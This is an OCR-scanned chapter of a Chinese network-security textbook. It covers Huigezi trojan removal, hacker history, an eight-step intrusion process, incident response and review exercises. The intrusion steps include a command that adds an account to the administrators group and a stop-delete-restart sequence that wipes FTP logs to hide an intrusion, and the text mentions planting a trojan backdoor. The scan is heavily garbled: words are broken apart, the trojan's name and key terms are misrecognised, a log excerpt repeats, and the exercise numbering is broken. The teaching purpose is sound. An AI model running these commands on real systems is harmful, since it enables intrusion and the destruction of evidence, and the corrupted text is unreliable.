令 , 然 后 输入 “game. exe”, 可 以 找到 灰 饮 子 服 务 项 ,此 例 为 “Game_Server” ,不同 版 本 灰 铝 子 
服务 名 称 会 有 不 同 , 如 图 8-22 所 示 。 


证 册 表 蝙 稀 圭 =iolxl 


全 
0Dx00000110 (272) 


E14 


图 8-22 ”查找 灰 饮 子 服务 项 


(3) 删除 灰 铝 子 服务 端 文件 。 重 启 计算 机 ,在 安全 模式 下 删除 Windows 目录 下 “Game. 
exe”“Game. dlj”“Game_Hook. dll" 以 及 "Gamekey. dll" 文 件 ,至 此 灰 铝 子 印 载 完 毕 。 

以 上 是 灰 铝 子 手工 检测 和 清除 的 通用 方法 ,但 仍 有 少数 变种 目前 无 法 检测 和 清除 。 同 
时 , 随 着 灰 铝 子 版 本 不 断 更 新 ,会 加 入 新 的 隐藏 方法 和 命名 规则 ,手工 检测 和 清除 难度 越 来 
越 大 。 建 议 读者 平时 系统 要 做 好 克隆 备份 ,系统 与 数据 分 区 存储 ,日 后 遇 到 问题 恢复 系统 盘 
即 可 ,不 要 把 时 间 浪 费 在 扫描 木马 与 查 杀 病 毒 之 中 。 

据 不 完全 统计 ,2007 年 全 国 遭 遇 黑 客人 侵 只 有 900 万 次 ,2009 年 攀升 至 5000 万 次 ,而 
2010 年 竟 达 12000 多 万 次 ,间接 经 济 损失 100 多 亿 元 ,中 国 是 遭受 黑客 人 侵 最 大 的 受害 国 
家 之 一 。 防 范 网 络 攻击 ,抵御 黑客 人 侵 .维护 系 统 安 全 任重道远 。 正 所 谓 “ 知 己 知 彼 , 百 战 不 
殖 ”, 要 学 会 抵御 网 络 人 侵 , 首 先 就 要 了 解 网 络 人 侵 基 本 步骤 ,从 攻击 中 掌握 防范 方法 ,从 攻 
击 中 寻求 解决 方案 ,从 攻击 中 汲取 维护 经 验 。 


8.4.1 黑客 与 骇 客 


在 武侠 世界 里 剑客 有 “侠客 ”与 “刺客 "之 分 ,虽然 两 种 “ 客 ”" 都 是 杀人 的 ,但 一 类 是 为 

了 惩 恶 扬 善 , 动 富 济贫 , 当 剑 客 纯粹 因为 迷恋 剑 法 ,而 另 一 类 习 武 只 是 借 此 杀人 赚钱 。 不 

同 的 习 武 目的 必然 导致 两 种 结局 ,侠客 武功 更 胜 一 筹 , 所 以 在 文人 笔下 ,刺客 永远 打 不 过 
侠客 。 
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网 络 安全 是 一 个 对 计算 机 不 断 探索 认 知 的 过 程 ,在 网 络 世 界 就 像 江湖 里 的 “ 奇 侠 ” 一 样 ， 
也 有 “黑客 ”与 “ 骇 客 " 之 分 。 黑 客 (Hacker) 原 本 是 讲义 词 , 原 指 熟 悉 编 程 语言 和 操作 系统 ， 
具有 追根 究 底 .发掘 漏洞 的 一 类 人 ,他 们 伴随 网 络 技术 的 发 展 而 成 长 ,对 网 络 安全 有 着 狂热 
兴趣 和 执着 追求 ,喜欢 挑战 高 难度 网 络 系统 并 从 中 找 出 漏洞 ,提出 解决 和 修复 方案 。 黑 客 不 
干涉 政治 ,入 侵 并 不 是 恶意 破坏 ,他 们 是 纵横 于 网 络 世界 的 大 侠 , 追 求 平等 .共享 和 免费 ,下 
是 他 们 推动 计算 机 系统 和 网 络 技 术 的 发 展 与 完善 。 

骇 客 (Cracker) 却 是 指 那些 怀 有 不 良 企 图 ,利用 已 知 漏洞 非法 入 侵 他 人 系统 窃取 数据 ， 
从 事 破坏 活动 的 一 类 人 。 虽 然 骇 客 与 黑客 出 发 点 不 同 , 但 他 们 都 是 系统 的 入 侵 者 ,在 行为 上 
很 难 界 定 两 者 的 特征 ,因此 含义 也 越发 模糊 ,目前 公众 对 两 者 的 区 别 已 经 弱化 ,把 入 侵 者 一 
律 称 之 为 黑客 。 


8.4.2 黑客 起 源 与 攻击 流程 


黑客 起 源 于 20 世纪 50 年 代 麻 省 理工 学 院 实验 室 ,一 般 都 是 高 级 技术 人 员 ,是 挖掘 计算 
机 程序 潜力 精英 。1983 年 美国 联邦 调查 局 首次 逮捕 6 名 少年 黑客 ,他 们 入 侵 60 多 台 计 算 
机 ,包括 阿拉 英国 家 实验 室 。1988 年 第 一 只 蠕虫 病毒 诞生 ,通过 网 络 传染 其 他 计算 机 ,占用 
大 量 系统 资源 和 带宽 ,使 当时 近 1/10 互联 网 络 陷 入 瘫痪 。1998 美国 五 角 大 楼 站 点 被 袭 , 工 
资 报表 和 人 员 数 据 被 自 改 。2011 年 ,美国 卷 人 利比亚 战争 ,同年 5 月 旗下 最 大 军火 供应 商 
克 希 德 -马丁 公司 9 遭 黑 客人 侵 。 

在 国内 ,黑客 频繁 出 现 应 从 1998 年 开始 。 目 前 ,黑客 发 展 趋势 主要 表现 以 下 三 
方面 。 
(1) 手段 高 明 化 。 黑 客 已 经 意识 到 仅 靠 一 人 之 力 远 远 不 足以 入 侵 复 杂 系 统 , 他 们 已 经 
逐渐 形成 一 个 团体 ,利用 网 络 协调 团体 攻击 ,互相 交流 经 验 共 同 提高 。 

(2) 活动 频繁 化 。 黑 客人 门 不 需要 掌握 大 量 计 算 机 和 网 络 知识 ,学 会 使 用 几 个 黑客 工 
具 就 可 以 在 互联 网 上 进行 攻击 入侵 ,黑客 工具 大 众 化 是 其 频繁 活动 的 主要 原因 。 

(3) 动机 复杂 化 。 黑 客 动机 已 经 不 再 局 限于 为 国家 、 金 钱 和 刺激 ,而 与 国际 政治 、 经 济 、 
文化 宗教 紧密 联系 在 一 起 。 

黑客 人 侵 意图 一 般 是 通过 获取 站 点 管理 员 密码 ,从 而 人 侵 服 务 器 窃取 数据 .控制 主机 和 
自 改 主页 , 若 无 法 入 侵 则 以 拒绝 服务 攻击 瘫 疾 目 标 服务 器 和 网 络 。 黑 客 攻 击 是 一 个 序 化 系 
统 工程 ,主要 分 为 以 下 几 个 基本 步骤 。 

(1) 踩点 。 踩 点 原意 是 指 策划 一 项 盗窃 活动 准备 阶段 。 在 黑客 攻击 领域 ,踩点 主要 是 
收集 整理 关于 目标 系统 机 构 安防 剖析 图 ,可 以 结合 工具 和 开放 信息 源 资源 搜索 。 

一 个 站 点 在 发 布 之 前 需要 向 域名 机 构 申请 域名 。 申 请 的 域名 信息 保存 在 域名 管理 机 构 
的 数据 库 中 ,并且 域 名 信息 对 外 公开 ,任何 人 都 可 以 查询 ,这 给 黑客 提供 许多 敏感 信息 ,如 系 
统 所 处 的 IP 段 、 因 特 网 .远程 访问 .虚拟 专用 网 .开放 资源 等 。 域 名 检索 信息 可 以 通过 以 下 
站 点 查询 。 


@ 洛克 希 德 -马丁 公司 是 美国 国防 部 头号 军火 供应 商 ,旗下 产品 包括 F-16、F-22 和 F-35 等 各 式 高 性 能 战机 以 及 
舰艇 。 
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@ 中 国 互联 网 络 信息 中 心 (http://www. cnnic. com. cn) 。 

@ 中 国 万 网 (http://www. net. cn)。 

网 络 拓扑 结构 是 组 建 网 络 的 方法 和 连接 形式 。 若 要 对 一 个 站 点 发 动 攻击 , 则 黑客 首先 
必须 了 解 目标 网 络 基 本 结构 。 只 有 清楚 掌握 目标 网 络 中 的 防火 墙 , 服 务 器 位 置 后 ,才能 进行 
下 一 步 人 侵 。 对 于 探测 网 络 系统 结构 最 常用 的 工具 是 Chepos, 它 以 图 形 方式 自动 发 现 、 显 
示 目 标 网 络 拓扑 ,录像 和 工具 可 在 http://www. gdcp. cn/jpkc/security 中 下 载 。 

(2) 扫描 。 网 络 扫描 是 网 络 安全 技术 之 一 ,通常 需要 结合 防火 墙 和 入 侵 检 测 系统 才能 
有 效 提 高 网 络 运行 的 安全 性 。 扫 描 器 并 不 是 攻击 工具 , 它 仅仅 能 发 现 目标 主机 状态 和 系统 
漏洞 。 管 理 员 根据 扫描 结果 可 以 及 时 发 现 弥 补 安全 漏洞 ,更正 网 络 系统 错误 配置 ,客观 评估 
安全 风险 等 级 ; 人 侵 者 利用 扫描 工具 也 可 以 达到 同样 效果 ,在 发 动 攻击 前 锁定 目标 主机 、 探 
测 开放 端口 .发掘 系 统 漏洞 、 破 解 系统 口令 等 。 

扫描 工具 分 为 主机 扫描 和 网 络 扫 描 。 其 中 ,主机 扫描 通过 执行 脚本 模拟 对 系统 实施 攻 
击 并 分 析 系 统 反 应 ,从 而 发 现 系 统 漏洞 ; 网 络 扫 描 是 针对 系统 设置 的 弱 口 令 、 安 全 规则 、 开 
放 端 口 等 进行 检查 。 

(3) 查 点 。 当 目标 确定 后 ,攻击 者 通过 查 点 获得 站 点 服务 的 账号 和 资源 , 比 踩点 ,扫描 
更 具 入 侵 效 果 。 查 点 和 操作 系统 有 关 , 收 集 信 息 包 括 系 统 版 本 、 服 务 类 型 \ 用 户 账号 和 用 户 
组 信息 、 路 由 表 等 。 

(4) 获取 权限 。 一 个 站 点 可 以 提供 多 个 服务 ,每 个 服务 也 可 以 存在 多 个 账号 共同 管理 ， 
黑客 需要 破解 每 个 服务 的 相应 账号 和 口令 才能 获取 管理 权限 ,进而 入 侵 站 点 系统 。 然 而 , 获 
取 服 务 管理 权限 ?是 一 个 系统 复杂 工程 ,成 功 几率 与 管理 员 水 平和 性 格 相 关 。 若 获取 不 成 
功 , 则 黑客 将 对 目标 系统 进行 拒绝 服务 攻击 。 

(5) 提升 权限 。 当 黑客 获得 服务 管理 权限 后 ,下 一 步 工 作 是 获取 操作 系统 管理 权限 。 
由 于 操作 系统 可 能 存在 多 个 账号 ,因此 为 防范 黑客 人 侵 窃 取 数据 ,有 经 验 的 管理 员 通 常 把 
“administrator”“admin" 等 看 似 管理 员 的 账号 设 为 客户 权限 ,把 看 似 “guest” 的 账号 设 为 管 
理 员 。 由 于 只 有 获得 操作 系统 权限 才能 对 数据 进行 筑 改 .添加 删除 及 复制 等 操作 , 故 黑客 
和信 侵 后 必须 提升 为 系统 管理 员 ,典型 方法 有 两 种 : 四 通过 木马 病毒 将 当前 账号 加 入 管理 员 
组 中 ,如 让 目标 服务 器 执行 “net localgroup administrators lee /add”, 是 指 把 lee 账号 加 入 管 
理 员 组 , 即 获得 管理 员 权 限 ; @ 通 过 系统 漏洞 或 基于 系统 第 三 方 软件 漏洞 新 建 管理 员 账 号 ， 
如 操作 系统 、Office、SQL 等 都 会 定期 更 新 版 本 弥补 漏洞 。 

(6) 数据 窃取 。 黑 客 拥 有 操作 系统 管理 权限 后 可 以 窃取 、 算 改 和 删除 服务 器 敏感 
数据 。 

(7) 掩盖 踪迹 。 系 统 日 志 是 记录 系统 硬件 软件 和 系统 问题 的 记录 ,用 于 监控 系统 发 生 
的 安全 事件 。 管 理 员 可 以 通过 系统 日 志 检 查 安全 事件 发 生 原因 和 过 程 ,并 从 中 寻找 入 侵 者 
留 下 的 痕迹 。 黑 客人 侵 后 必须 掩盖 清除 相应 日 志 避 免 被 检测 反 追 击 。 系 统 日 志 包 括 应 用 程 
序 日 志 、 安 全 日 志和 系统 日 志 , 表 8-4 是 常用 系统 日 志文 件 名 和 存放 路 径 。 


@ ”服务 管理 权限 和 操作 系统 管理 权限 是 不 同 的 。 服 务 管理 权限 是 管理 该 服务 的 权限 ,如 管理 Web 站 点 需要 相应 
后 台 ( 由 制作 该 Web 站 点 人 员 开 发 ) 管 理 权 限 , 但 这 个 权限 不 能 访问 和 管理 站 点 的 操作 系统 。 
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表 8-4 常用 系统 日 志文 件 名 和 存放 路 径 


日 志 类 型 存放 路 径 
DNS 日 志文 件 Wsystemroot% \system32\config 
安全 日 志文 件 Ysystemroot% \system32\config\SecEvent. EVT 


系统 日 志文 件 


systemroot% \system32\config\SysEvent. EVT 


应 用 程序 日 志文 件 


Wsystemroot% \system32\config\AppEvent. EVT 


FTP 日 志文 件 


%systemroot%\system32\logfiles\msftpsvcl\ ,每 天 一 个 文件 


WWW 日 志文 件 


%systemroot%\system32\logfiles\w3svcl\, 每 天 一 志 


计划 任务 日 志文 件 


systemroot% \schedlgu. txt 


下 面 以 FTP 日 志 为 例 讲述 事件 发 生 详 细 过 程 。FTP 日 志 默 认 每 天 生成 新 文件 用 于 记 
录 当 日 发 生 的 用 户 登 录 信息 ,文件 名 格式 为 “ex 十 年 份 十 月 份 十 日 期 ”, 例 如 “ex121023” 表 示 
2012 年 10 月 23 日 产生 的 日 志 , 用 记事 本 打开 如 下 。 


井 Software: Microsoft Internet Information Services 6.0 (微软 IIS6.0) 
并 Version: 1.0 (版 本 1.0) 


井 Date: 20001023 0315 


(服务 启动 时 间 日 期 ) 


#FIElds: time cip csmethod csuristem scstatus 


0315 192.168.1.10 [1 


图 登录 ) 
0318 192.168.1.10 [1 


USER administator 331 (IP 地 址 为 192.168.1.10 用 户 名 为 administator 试 


PASS - 530 (登录 失败 ) 


032:04 192.168.1.10 [1]USER nt 331 (IP 地 址 为 192.168.1.10 用 户 名 为 nt 的 用 户 试图 登录 ) 
032:06 192.168.1.10 [1]PASS - 530 (登录 失败 ) 
032:09 192.168.1.10 [1]USER cyz 331 (IP 地址 为 192.168.1.10 用 户 名 为 cyz 的 用 户 试 图 登录 ) 


0322 192.168.1.10 [1 
0322 192.168.1.10 [1 


试图 登录 ) 
0324 192.168.1.10 [1 


PASS - 530 (登录 失败 ) 
USER administrator 331 (IP 地 址 为 192.168.1.10 用 户 名 为 administrator 


PASS - 230 (登录 成 功 ) 0315 192.168.1.10 [1]USER administator 331 (IP 


地 址 为 192.168.1.10 用 户 名 为 administator 试图 登录 ) 


0318 192.168.1.10 [1 


PASS - 530 (登录 失败 ) 


032:04 192.168.1.10 [1]USER nt 331 (IP 地 址 为 192.168.1.10 用 户 名 为 nt 的 用 户 试图 登录 ) 
032:06 192.168.1.10 [1]PASS - 530 (登录 失败 ) 
032:09 192.168.1.10 [1]USER cyz 331 (IP 地 址 为 192.168.1.10 用户 名 为 cyz 的 用 户 试图 登录 ) 


0322 192.168.1.10 [1 
0322 192.168.1.10 [1 
试图 登录 ) 

0324 192.168.1.10 [1 
0321 192.168.1.10 [1 
0325 192.168.1.10 [1 


PASS - 530 (登录 失败 ) 
USER administrator 331 (IP 地 址 为 192.168.1.10 用 户 名 为 administrator 


PASS - 230 (登录 成 功 ) 
MKD nt 550 (新 建 目录 失败 ) 
QUIT- 550 (退出 FTP 程序) 


从 以 上 日 志 可 以 看 出 ,IP 地 址 为 “192. 168. 1. 10” 用 户 一 直 尝 试 人 侵 FTP 服务 , 换 了 4 
次 用 户 名 和 密码 才 登 录 成 功 。 管 理 员 可 以 获得 入 侵 时 间 、 入 侵 IP 以 及 账号 名 ,如 上 例 入 侵 
者 最 终 在 凌晨 3:25 以 “administrator” 账 号 登录 ,那么 就 要 考虑 更 换 用 户 名 密码 ,或 者 停 用 
该 账号 。 因 此 ,黑客 为 避免 被 检测 出 来 ,在 退出 前 会 将 表 8-4 所 示 的 日 志文 件 删除 ,或 只 清 
除 自己 留 下 的 痕迹 让 管理 员 无 法 反 追 击 甚至 无 法 察觉 系统 被 人 侵 , 步 骤 如 下 。 
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@ 运行 net stop mstfpsvc 命令 停 掉 msftpsvc 服务 。 

@ 运行 “del * . * ”命令 或 者 找到 日 志文 件 将 其 删除 。 

@ 运行 net start msftpsvc 命令 ,再 打开 msftpsvc 服务 。 

(8) 创建 后 门 。 在 系统 被 入 侵 后 ,管理 员 可 以 通过 日 志文 件 将 账号 名 和 密码 锁定 并 弥 
补 相 关 漏 洞 ,有 针对 性 地 防范 事件 再 次 发 生 。 黑 客 为 长 期 占有 被 控 主 机 ,往往 会 在 入 侵 系 统 
上 和 留 下 后 门 。 后 门 不 同 于 病毒 , 它 非常 隐蔽 ,不 具备 感染 性 ,可 以 绕 过 系统 安全 限制 让 入 侵 
者 再 次 登录 系统 。 创 建 后 门 的 最 简单 方法 是 新 建 一 个 具有 管理 员 权 限 账号 ,下 次 通过 该 账 
号 密码 人 侵 , 但 这 种 方法 容易 被 发 现 ; 相对 隐蔽 地 可 以 留 下 木马 程序 ,如 放置 灰 铝 子 木马 ， 
日 后 通过 灰 铝 子 服务 端 控制 目标 服务 器 。 


8.4.3 应 对 入 侵 策略 


黑客 人 侵 的 背后 往往 包含 复杂 动机 ,有 的 是 为 了 窃取 数据 ,有 的 是 受 利益 驱动 ,有 的 是 
表达 政治 立场 ,有 的 纯粹 为 了 好 奇 炫 炮 。 目 的 不 同 , 手 段 各 异 , 所 造成 的 影响 和 损失 也 不 尽 
相同 。 因 此 ,在 处 理 入 侵 事 件 时 应 当 对 症 下 药 , 有 的 放 矢 才能 达到 防范 效果 ,不 要 一 味 给 系 
统 更 新 补丁 和 查 杀 木马 。 系 统 人 侵 后 的 应 对 策略 和 步骤 如 下 。 

(1) 估计 形势 。 当 证 实 服务 器 遭受 入 侵 后 ,第 一 步 措施 是 尽快 估计 入 侵 造 成 的 影响 范 
围 和 破坏 程度 ,如 业务 是 否 中 断 ,数据 是 否 窃取 ,系统 是 否 破坏 等 。 客 户 机 遭 入侵 后 的 第 一 
步 是 断 开 网 络 避 免 被 黑客 控制 ,或 通过 网 络 感染 别 的 计算 机 。 

(2) 夺回 系统 控制 权 。 假 如 敏感 数据 已 被 破坏 或 窃取 ,最 重要 的 不 是 恢复 抢救 丢失 数 
据 , 而 是 保护 暂 未 算 改 删除 的 数据 ,前 提 是 夺回 系统 控制 权 。 为 夺回 控制 权 , 服 务 器 可 以 通 
过 结束 可 疑 进程 切断 与 黑客 主机 的 通信 ,有 条 件 的 可 以 启用 备用 服务 器 后 重启 系统 和 断 开 
网 络 。 

(3) 建立 快照 。 建 立 被 入 侵 后 的 系统 快照 以 便 调查 取证 和 事后 分 析 。 

(4) 审查 日 志 。 日 志文 件 详细 记录 服务 器 遭受 入侵 的 全 过 程 ,如 黑客 访问 过 哪些 数据 、 
做 了 哪些 改动 .执行 哪些 操作 、 利 用 哪个 IP 入 侵 等 。 通 过 审查 日 志 , 管 理 员 可 以 对 和 人 侵 行为 
和 目的 有 更 清晰 地 认识 。 

(5) 入 侵 分 析 。 检 查 黑客 对 系统 配置 所 做 的 修改 ,检查 和 清除 留 下 的 入 侵 工 具 和 痕迹 ， 
如 木马 程序 ,后 门 陷阱 等 。 

(6) 系统 和 数据 恢复 。 服 务 器 平时 要 做 好 数据 备份 和 增 量 备份 工作 ,在 恢复 前 要 确定 
系统 入 侵 的 具体 时 间 ,从 而 确定 备份 文件 哪些 可 用 、 哪 些 不 可 用 。 

(7) 查 漏 补缺 。 通 过 入 侵 分 析 判 断 黑客 是 通过 何 种 方式 进行 人 侵 , 再 更 新 弥补 相应 漏 
洞 ,关闭 不 必要 端口 和 服务 ,配置 本 地 安全 策略 ,更 换 系统 账户 和 密码 。 

(8) 事后 分 析 。 当 入 侵 事件 处 理 完成 后 ,还 要 对 事件 处 理 过 程 进行 事后 分 析 , 从 中 汲取 
教训 ,起 到 触 类 旁 通 、 举 一 反 三 的 作用 ,以 杜绝 类 似 事 件 青 次 发 生 。 

以 上 是 服务 器 遭受 入 侵 后 的 应 对 策略 。 读 者 通过 掌握 黑客 和 人 侵 系 统 方式 和 基本 步骤 ， 
为 网 络 安全 学 习 打 下 理论 基础 ,给 网 络 安全 维护 工作 带 来 宝贵 经 验 。 
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本 章 小 结 


本 章 介 绍 了 计算 机 网 络 安全 的 定义 和 威胁 ,涉及 恶意 代码 分 类 和 特征 、 攻 击 手段 和 安全 
技术 .入 侵 步骤 和 应 对 策略 。 黑 客人 侵 手段 和 网 络 安全 技术 表面 对 立 , 但 本 质 相 同 ,两 者 相 
互 促进 .相互 牵 衡 ,共同 推动 计算 机 网 络 技术 的 发 展 和 完善 。 读 者 在 学 习 时 不 但 要 把 握 理 论 
高 度 ,更 要 注重 实践 培养 ,从 攻击 中 寻求 解决 方案 ,由 攻击 中 掌握 防范 方法 ,在 攻击 中 汲取 宝 
贵 经 验 。 本 章 知识 结构 如 图 8-23 所 示 。 


保密 性 
完整 性 
| 可 用 性 
网 络 安全 需求 不 可 否认 性 
身份 验证 
授权 和 访问 控制 
数据 加 密 
数字 签名 
网 络 安全 包 过 滤 防 火 墙 
网 汪 人 全 全 休 wml ka 
状态 检测 防火 墙 
入 侵 检 测 
口令 攻击 
缓冲 区 溢出 
安全 威胁 3 恶意 代码 
欺骗 攻击 
拒绝 服务 攻击 
图 8-23 第 8 章 知识 结构 图 
思考 练习 题 
一 、 填 空 题 
1. 防火 墙根 据 实现 方式 可 以 分 为 s 和 状态 检测 防火 墙 。 
2. 计算 机 网 络 按 拓扑 结构 可 以 划分 为 总 线 型 . 星 形 、 环 形 、 树 型 和 。 其 中 ,用 
交换 机 组 建 的 局 域 网 属于 拓扑 结构 ,Internet 属于 拓扑 结构 。 
3. 加 密 分 为 对 称 密 钥 加 密 和 非 对 称 密 钥 加 密 两 种 ,数字 签名 采用 ,DES 属 
机 上 
4. 包 过 滤 防 火 墙 工作 在 OSI 参考 模型 中 的 = 
二 、 选 择 题 
1. 在 以 下 网 络 威胁 中 ,不 属于 信息 泄露 的 是 。 
A. 数据 窃听 B. 流量 分 析 C. 拒绝 服务 攻击 ”D. 偷窃 用 户 账号 
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10. 


MM 


12. 


13. 


. 数据 在 存储 或 传输 时 不 被 修改 、 破 坏 , 或 数据 包 的 丢失 \ 乱 序 等 指 的 是 


. 中 断 指 攻击 者 破坏 网 络 系统 资源 ,使 之 变 成 无 效 或 无 用 ,这 是 对 的 攻击 。 
A. 可 用 性 B. 保密 性 C. 完整 性 D. 真实 性 
. 保证 数据 的 完整 性 就 是 


A. 保证 因特网 上 传送 的 数据 信息 不 被 第 三 方 监视 和 窃取 
B. 保证 因特网 上 传送 的 数据 信息 不 被 自 改 

C. 保证 电子 商务 交易 各 方 的 真实 身份 

D. 保证 发 送 方 不 能 抵赖 曾经 发 送 过 某 数据 信息 


. 下 列 属于 网 络 防 火 墙 功能 的 是 。 

A. 防止 内 网 入 侵 外 网 B. 防止 外 网 入 侵 内 网 

C. 防止 和 查 杀 病毒 D. 限制 内 网 与 外 网 的 链接 
. 数据 保密 性 指 的 是 


A. 保护 网 络 中 各 系统 之 间 交 换 的 数据 ,防止 因数 据 被 截获 而 造成 泄密 

B. 提供 连接 实体 身份 的 鉴别 

C. 防止 非法 实体 的 主动 攻击 ,保证 数据 接收 方 收 到 的 信息 与 发 送 方 发 送 的 信息 一 致 
D. 确保 数据 数据 是 由 合法 实体 发 出 的 


. 包 过 滤 技 术 与 代理 服务 技术 相 比 较 __。 


A. 包 过 滤 技 术 安 全 性 较 弱 、 但 会 对 网 络 性 能 产生 明显 影响 

B. 包 过 滤 技 术 对 应 用 和 用 户 是 绝对 透明 的 

C. 代理 服务 技术 安全 性 较 高 ,但 不 会 对 网 络 性 能 产生 明显 影响 
D. 代理 服务 技术 安全 性 高 ,对 应 用 和 用 户 透明 度 也 很 高 


. 以 下 不 属于 入 侵 检测 系统 的 功能 是 。 


A. 监视 网 络 上 的 通信 数据 流 B. 捕捉 可 疑 的 网 络 活动 
C. 提供 安全 审计 报告 D. 过 滤 非 法 的 数据 包 


.以 下 关于 对 称 密 钥 加 密 说 法 正确 的 是 。 


A. 加 密 方 和 解密 方 可 以 使 用 不 同 的 算法 
B. 加 密 密 钥 和 解密 密 钥 可 以 是 不 同 的 
C. 加 密 密 钥 和 解密 密 钥 必须 是 相同 的 
D. 密 钥 的 管理 非常 简单 


A. 数据 完整 性 B. 数据 一 致 性 ” C. 数据 同步 性 ” D. 数据 源 发 性 
在 防范 Windows 操作 系统 中 ,IPC$ 攻击 的 方法 不 包括 。 


A. 关闭 账号 的 空 连接 B. 删除 管理 共享 
C. 指定 安全 口令 D. 安装 最 新 的 系统 补丁 


以 下 不 属于 非 对 称 加密 算 法 特点 的 是 s 
A. 计算 量 大 B. 处 理 速 度 慢 。 C. 使 用 两 个 密码 ”D. 适合 加 密 长 数据 
计算 机 网 络 安全 目标 不 包括 。 
A. 保密 性 B. 不 可 否认 性  C. 免疫 性 D. 完整 性 
端口 扫描 技术 s 
A. 只 能 作为 攻击 工具 
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14. 


15. 


16. 


Ve 


18. 


| 


B. 只 能 作为 防御 工具 
C. 只 能 作为 检查 系统 漏洞 的 工具 
D. 既 可 以 作为 攻击 工具 ,也 可 以 作为 防御 工具 


以 下 不 属于 恶意 代码 的 特征 是 

A. 恶意 的 目的 B. 本 身 是 程序 

C. 通过 执行 发 生 作用 D. 不 通过 执行 也 能 发 生 作用 
下 列 对 计算 机 网 络 的 攻击 方式 中 ,属于 被 动 攻击 的 是 

A. 口令 嗅 探 B. 重 放 C. 拒绝 服务 D. 物理 破坏 
包 过 滤 技 术 防 火 墙 在 过 滤 数 据 包 时 ,一 般 不 关心 g 

A. 数据 包 的 源 地 址 B. 数据 包 的 目的 地 址 

C. 数据 包 的 协议 类 型 D. 数据 包 的 内 容 

下 列 不 属于 数据 传输 安全 技术 的 是 。 

A. 防 抵赖 技术 B. 数据 传输 加 密 技术 

C. 数据 完整 性 技术 D. 旁 路 控制 


关于 特征 代码 法 ,下 列 说 法 错误 的 是 
A. 采用 特征 代码 法 检测 准确 

B. 采用 特征 代码 法 可 识别 病毒 的 名 称 

C. 采用 特征 代码 法 误 报 警 率 高 

D. 采用 特征 代码 法 能 根据 检测 结果 处 理解 毒 


、 简 答题 

. 简 述 网 络 安全 的 定义 。 

. 简 述 防火 墙 的 功能 和 分 类 。 

. 简 述 拒绝 服务 攻击 的 原理 和 实现 形式 。 
. 简 述 常用 网 络 攻击 的 形式 与 分 类 。 

. 简 述 网 络 安全 的 主要 技术 。 
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